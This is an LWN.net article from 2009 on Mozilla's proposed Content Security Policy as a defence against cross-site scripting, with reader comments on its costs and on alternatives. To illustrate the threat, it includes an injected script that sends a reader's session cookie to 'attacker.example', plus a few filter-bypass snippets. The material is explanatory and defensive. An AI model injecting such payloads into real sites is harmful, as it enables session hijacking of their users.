
Mozilla's Content Security Policy

By Jake Edge
July 1, 2009

Cross-site scripting (XSS) is a common web application flaw that can lead to a wide variety of attacks. The problem, and ways to eliminate it, have been known for years, but new instances of XSS crop up regularly in web applications—live sites as well as packages like content management systems. Mozilla has taken the lead on a new security policy, Content Security Policy (CSP), which provides a way for sites to avoid XSS. It does that by fundamentally changing the way JavaScript content is treated by the browser, but does so in a way that allows sites to opt in to the new policy.

XSS works by injecting JavaScript content into the data returned by a web server. Normally that happens because some kind of user input was not properly filtered before it was echoed back on a web page. If that user input—in the form of a comment on an article, for example—contains unfiltered JavaScript, the user's browser will happily execute it as if it originated with the site. At that point, attacker-controlled code is running with the privileges of the browser user and the origin site.
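For example, if a site echoes comments back without escaping them, a comment containing something like the following (the attacker hostname is invented for illustration) would run in every reader's browser and could quietly send their session cookie to the attacker:

    <script>
      // fires the victim's cookie off to the attacker as an image request
      new Image().src = "http://attacker.example/steal?c=" +
                        encodeURIComponent(document.cookie);
    </script>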

As described by Mozilla security program manager Brandon Sterne on the Mozilla Security Blog, CSP changes that model. Instead of treating all content received in a response as having the same privilege level, CSP allows the site owner to explicitly list what kinds of JavaScript to trust. In order to do that, however, CSP strictly limits where JavaScript can originate, and where it can appear in HTML.

Basically, CSP allows a site operator to list the hosts from which JavaScript content will be accepted. If that option is used (via an HTTP X-Content-Security-Policy header or an HTML <META> tag), all JavaScript must be loaded from external files served by hosts on the list—all other mechanisms for executing JavaScript are disabled for that page. Sterne describes it this way:

In order to differentiate legitimate content from injected or modified content, CSP requires that all JavaScript for a page be 1) loaded from an external file, and 2) served from an explicitly approved host. This means that all inline script, javascript: URIs, and event-handling HTML attributes will be ignored. Only script included via a <script> tag pointing to a white-listed host will be treated as valid.
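As a rough sketch of what such a policy might look like (the draft's directive syntax was still in flux at the time, so treat the details loosely), a site could send a header along these lines:

    X-Content-Security-Policy: allow 'self'; script-src 'self' trustedscripts.example.com

With that policy in place, <script src> tags pointing at the site itself or at trustedscripts.example.com would work, while inline scripts and scripts from any other host would simply be ignored.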

This will be an enormous change for sites that want to use CSP, but it is backward-compatible with older browsers (or those that do not support CSP), and there are ways to incrementally approach the implementation. Sterne notes that all sites should be able to make the switch, and Mozilla intends to provide a migration guide to help sites convert to CSP. But, it remains to be seen whether sites will actually use it. Mozilla security lead Daniel Veditz commented about that in the bug entry that tracks the CSP implementation:

Funny you should mention the onclick attribute as that one specifically is a popular one to abuse. Whether the burden of rewriting your site to the supported safe subset of HTML is worth it depends on how valuable the contents of your site are.

Note that we are not eliminating event handlers, just the ability to specify them inline. addEventListener() will still work, as will setting the .onclick property of a DOM node. This is a little cumbersome, but there are already sites that do this for some of their content.

CSP is a gamble; it could be that the hurdle will turn out to be too high. But if we can get authors over that hurdle we can promise them a safer site.
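In concrete terms, markup like <button onclick="save()"> would have to lose its inline handler, with the wiring moved into an external file served from a white-listed host; something like this (the element ID and function name are invented for illustration):

    // app.js, loaded via a <script src> tag from an approved host
    document.getElementById("save-button")
            .addEventListener("click", function () {
                save();
            }, false);  // explicit useCapture argument for older browsers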

Another interesting feature of CSP is its ability to notify a site when there is an attempt to violate the policy. This will even benefit users of browsers that don't support CSP, as XSS holes can be recognized and fixed more quickly. Sterne is optimistic about the effect of CSP:

The bottom line is that it will be extremely difficult to mount a successful XSS attack against a site with CSP enabled. All common vectors for script injection will no longer work and the bar for a successful attack is placed much, much higher.
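The reporting feature mentioned above is driven by the policy itself: the draft specification pairs the host list with a report-uri directive naming a URL to which the browser sends a report whenever it blocks something. Roughly, with a hypothetical path:

    X-Content-Security-Policy: allow 'self'; report-uri /csp-violation-report

Since the reports come from CSP-aware browsers, a single Firefox user tripping over an injected script would reveal a hole that affects users of every browser.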

The open question is whether site operators are concerned enough about XSS to change the way they handle JavaScript. Over time, automated tools may help with that process, which could lower the bar somewhat, but it is still a daunting task. One would guess that the other browsers will take a "wait and see" attitude before deciding whether to implement it. Though the implementation is progressing, there is also no word from Mozilla on when it might release a browser with CSP.

Perhaps CSP is too heavy-handed a solution to the XSS problem, but it is good to see Mozilla taking a lead in trying to find something that will alleviate the problem. There are other, similar efforts in the works at Mozilla, including the Origin header to mitigate cross-site request forgery and clickjacking.
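The Origin header takes a much narrower approach than CSP: the browser attaches the origin of the page that initiated a cross-site request, so a server can refuse state-changing requests that arrive from somewhere unexpected. Schematically (hostnames invented):

    POST /account/transfer HTTP/1.1
    Host: bank.example
    Origin: http://attacker.example

A bank.example server seeing that Origin value can simply reject the request.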

While these web application vulnerabilities are largely understood and techniques to avoid them are known, they keep cropping up. Finding ways to make users' browsers more resistant to these kinds of attacks can only help improve web security.



Mozilla's Content Security Policy

Posted Jul 2, 2009 9:45 UTC (Thu) by tzafrir (subscriber, #11501)

What effect will this have on the ease of use of googlesyndication.com and other "web bugs"?

Mozilla's Content Security Policy

Posted Jul 2, 2009 13:02 UTC (Thu) by mrshiny (subscriber, #4266)

At first glance it does appear that this policy will dramatically limit the ease of adding third-party content to the page, such as ads, if that content uses scripts. For one thing, ad content will need to be rewritten to load external .js files. For a service such as Google Analytics, the service provider will need to document all the hostnames that serve any JS content (assuming the initial .js file loads additional scripts, which is relatively common).
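Assuming the draft's directive syntax, a site using such a service would end up with a policy that enumerates every host the service loads script from; something like the following, where the host list is exactly the part the provider would need to document:

    X-Content-Security-Policy: allow 'self'; script-src 'self' www.google-analytics.com ssl.google-analytics.com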

This policy has the potential to be extremely powerful, but the difficulty of implementation is relatively high, especially for many of the popular sites. However, for any site which doesn't have ads it could be done easily. I know that the site I maintain would need some framework upgrades to support this feature; however, when coding with this approach in mind, it is easy enough to apply. And it's fully backwards compatible, which is great.

Standards?

Posted Jul 2, 2009 10:06 UTC (Thu) by alex (subscriber, #1355)

Isn't this something that should be pushed through the W3C standards process?

Standards?

Posted Jul 2, 2009 16:13 UTC (Thu) by JoeBuck (subscriber, #2330)

When a standard invents new functionality, it's usually a mistake. It's better to gain experience with a prototype implementation, and if it works well, standardize that.

If a browser maker announces an experimental feature and does not assert patent rights that block others from using it, and it works out well, the standards committees can then add it to future standards.

Standards?

Posted Jul 2, 2009 16:29 UTC (Thu) by alex (subscriber, #1355)

Fair enough, I hadn't thought of it that way. I guess when I saw a browser was "innovating" I had flashbacks to the bad old days of proprietary HTML tags.

It would be interesting to know what Opera/Microsoft/WebKit developers think would help solve the problem.

Standards?

Posted Jul 6, 2009 14:08 UTC (Mon) by sbergman27 (guest, #10767)

"""
...when I saw a browser was "innovating" I had flash backs of the bad old days of proprietary HTML tags.
"""

As well you should. I don't recall anyone at Netscape or MS asserting patent rights that blocked others from using their proprietary stuff. They were both just doing their own thing and playing the NIH game... as seems to be happening here. This does look very much like the bad old days of proprietary HTML tags. The standards should come first.

Mozilla's Content Security Policy

Posted Jul 2, 2009 14:27 UTC (Thu) by butlerm (subscriber, #13312)

Unless your application has a large number of places that are vulnerable to being incorrectly coded to output large user-submitted text fields without encoding, or user-submitted HTML content without sanitization checks, the added value of this system is approximately zero.

Enabling this policy also makes it effectively impossible to use dynamically generated JavaScript without generating a bunch of little temporary files and forcing the web browser to submit secondary requests to fetch them. That has major performance implications due to turn-around latency. It also seriously complicates the application development process.

For applications produced in an environment where developers are unaware of or unable to follow basic security practices, or where even a temporary unpatched XSS vulnerability is a serious matter, it would be far better to propose an extension where script tags needed to carry an attribute with a generated value that matched a value supplied in the HTTP response headers.

That would effectively eliminate any real possibility of the web browser executing a hostile user-submitted script, due to the impossibility of predicting a match and the change in the generated value on every request.
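A sketch of that suggestion (the header name and attribute are hypothetical; this is the commenter's proposal, not part of CSP): the server mints a fresh random value for every response, sends it in a header, and stamps it onto each script tag it intentionally emits:

    X-Script-Token: d9f3a1c47b20e685

    <script token="d9f3a1c47b20e685" src="/js/app.js"></script>
    <script token="d9f3a1c47b20e685">initPage();</script>

An injected script cannot carry the right token, since an attacker has no way to predict a value that changes on every request.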

Mozilla's Content Security Policy

Posted Jul 2, 2009 17:17 UTC (Thu) by joey (guest, #328)

I think you're probably right, which is a real pity, since sanitizing user-supplied html to remove all possible means of javascript injection is very tricky.
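Part of what makes it tricky is how many places script can hide besides <script> tags; a sanitizer that only strips those still lets things like the following through (contrived examples):

    <img src="x" onerror="alert(document.cookie)">
    <a href="javascript:alert(document.cookie)">click me</a>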

I wish this CSP could be turned on at a block level. Something like:

<csp="no-javascript"> user supplied html here </csp>

Mozilla's Content Security Policy

Posted Jul 2, 2009 17:19 UTC (Thu) by joey (guest, #328)

BTW, right after I posted that, I found a javascript stripping bug in lwn.net, which I've emailed to Jon. :-/

Mozilla's Content Security Policy

Posted Jul 11, 2009 19:09 UTC (Sat) by tulcod (guest, #59536)

If users can inject <script> tags, I don't see any reason why they shouldn't be able to inject </csp> tags.

What Mozilla proposed is not a solution either, though: there is no reason users cannot upload scripts to a host. Heck, websites on most free webhosts would still be vulnerable. I think a better solution would be to only allow javascript to exist in the <head> tag, although this wouldn't help websites which, for whatever weird reason, allow users to put stuff in the <head> of a webpage. XSS is an inherent problem with launching scripts from editable content. It would be better to disallow <script> tags completely and use a different mechanism to include javascript in a webpage alongside the HTML delivery, but that would mean properties like onclick and onmouseover would also have to be banned, which induces some rather serious limitations (read: webmasters won't like this).

For now, I'll stick with bbcode and some url encoding.

ps: wow, "webmasters". when was the last time I used that phrase?

Mozilla's Content Security Policy

Posted Jul 9, 2009 13:03 UTC (Thu) by swiftone (guest, #17420)

Unless your application has a large number of places that are vulnerable to being incorrectly coded to output large user-submitted text fields without encoding, or user-submitted HTML content without sanitization checks, the added value of this system is approximately zero.

Any site that accepts user input has places that are vulnerable to being incorrectly coded. And as simple as correct coding is, it doesn't take much effort to discover that a large number of sites are doing it poorly, either because it turns out that cleansing input is non-trivial after all, or because it is easy to be lazy.

It takes only one developer screwing up in one place to leave a site vulnerable. And because of attacks like cross-site request forgery (generating a request to a different application that the user is authenticated to), a developer on one app can leave another, otherwise secure, app vulnerable.

This policy allows the server administrator to greatly reduce the threat in one fell swoop. I would not call that added value "zero".

Meanwhile the cost is:

  • No inline JS - Not a problem; inline JS is considered a poor practice in terms of accessibility and maintenance. Use progressive enhancement techniques anyway.
  • JS in outside files - Again, a best practice in terms of maintenance and code reuse.

These costs seem far from prohibitive for the benefit, in my opinion.

It is true that this makes dynamically generated JavaScript difficult. But who (outside of attackers) uses dynamically generated JavaScript? With the large array of stable and useful JS libraries available, there should be no need for such butchery. (JSON parsers/generators are specifically mentioned as not being a problem in the CSP FAQ.) Is there some bastion of useful dynamically generated JS that I am unaware of?
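One common replacement for generated JavaScript is generated data: the page-specific values travel as JSON while a static, white-listed script consumes them. A sketch (the URL and function name are invented for illustration):

    // static app.js served from an approved host; nothing page-specific in it
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "/page-data.json", true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState === 4 && xhr.status === 200) {
            // only the data is dynamic; the code never changes
            initPage(JSON.parse(xhr.responseText));
        }
    };
    xhr.send();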

Mozilla's Content Security Policy

Posted Jul 2, 2009 16:03 UTC (Thu) by alankila (guest, #47141)

When security is traded off against functionality, security usually loses and functionality wins. I predict a failure of this effort: the difficulties in transforming existing applications and web frameworks to support this seem large. If they had at least said that you can put <script> into <head> before the tag that disables inline scripts...

Mozilla's Content Security Policy

Posted Jul 2, 2009 16:16 UTC (Thu) by JoeBuck (subscriber, #2330)

A bank or an online commerce site might still think that the tradeoff is worth it. In a situation where an XSS attack costs either the bank or the customer real money, the extra work could easily be justified.

Mozilla's Content Security Policy

Posted Jul 4, 2009 9:08 UTC (Sat) by NAR (subscriber, #1313)

Why would a bank let HTML input into any forms?

why not sha checksum?

Posted Jul 2, 2009 16:48 UTC (Thu) by ccyoung (guest, #16340)

why not have a SHA hash for the page - if the hash is incorrect, no javascript on the page is run.

this would allow on-page javascript to stay - in my case a good idea, since a lot of the javascript itself is dynamic.

why not sha checksum?

Posted Jul 2, 2009 23:20 UTC (Thu) by riddochc (guest, #43)

Think about this some. What are you taking the SHA sum of? The content of the page, of course. Say, for example, that the page in question contains a number of user-entered comments, like this one on LWN you're reading. Those comments were probably stored in a database; a script pulls them out and inserts them into the appropriate places on the page.

Your checksum won't tell you whether there are references to javascript in the content that's been sent to your browser. If the server didn't filter them properly, and your browser just does as it's told (without giving you control over whether it should treat any individual portion as code or data), then your SHA sum will check out just fine: the malicious code was already part of the page when the sum was computed, because it went into the comment system in the first place.

not following

Posted Jul 2, 2009 23:44 UTC (Thu) by ccyoung (guest, #16340)

yes, the sha1 hash needs to be of the page including the "data" (I guess this would hash everything but the header itself?).

no javascript would execute before the hash is verified (perhaps one hash for the head and one for the body might speed things up).

is this impossible to do?

not following

Posted Jul 3, 2009 1:00 UTC (Fri) by riddochc (guest, #43)

No, taking a hash of any page is very easy to do. It simply doesn't do anything to solve this problem.

Suppose you're in charge of a city with a high rate of criminals breaking into people's houses. Your solution basically amounts to changing the house numbers on every street, in the hopes that that will prevent criminals from finding houses to break into -- never mind that they're already on the street in front of the physical buildings.

By the time the nefarious content has reached the browser, if the browser just goes on its merry way interpreting any javascript it's been sent, it doesn't matter much what else the server says to the client. If someone managed to insert javascript code into their comment, and submit it to the server so it'll show up in another user's browser, the TV's already on the sidewalk.

What the Mozilla proposal basically amounts to is making the browser not just interpret any random javascript it's been sent, but letting the website authors say, "Javascript that comes from here (the site's trusted javascript), go ahead and run - but ignore any other javascript, or triggers for it, you see on the web page."


Copyright © 2009, Eklektix, Inc.
This article may be redistributed under the terms of the Creative Commons CC BY-SA 4.0 license
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds
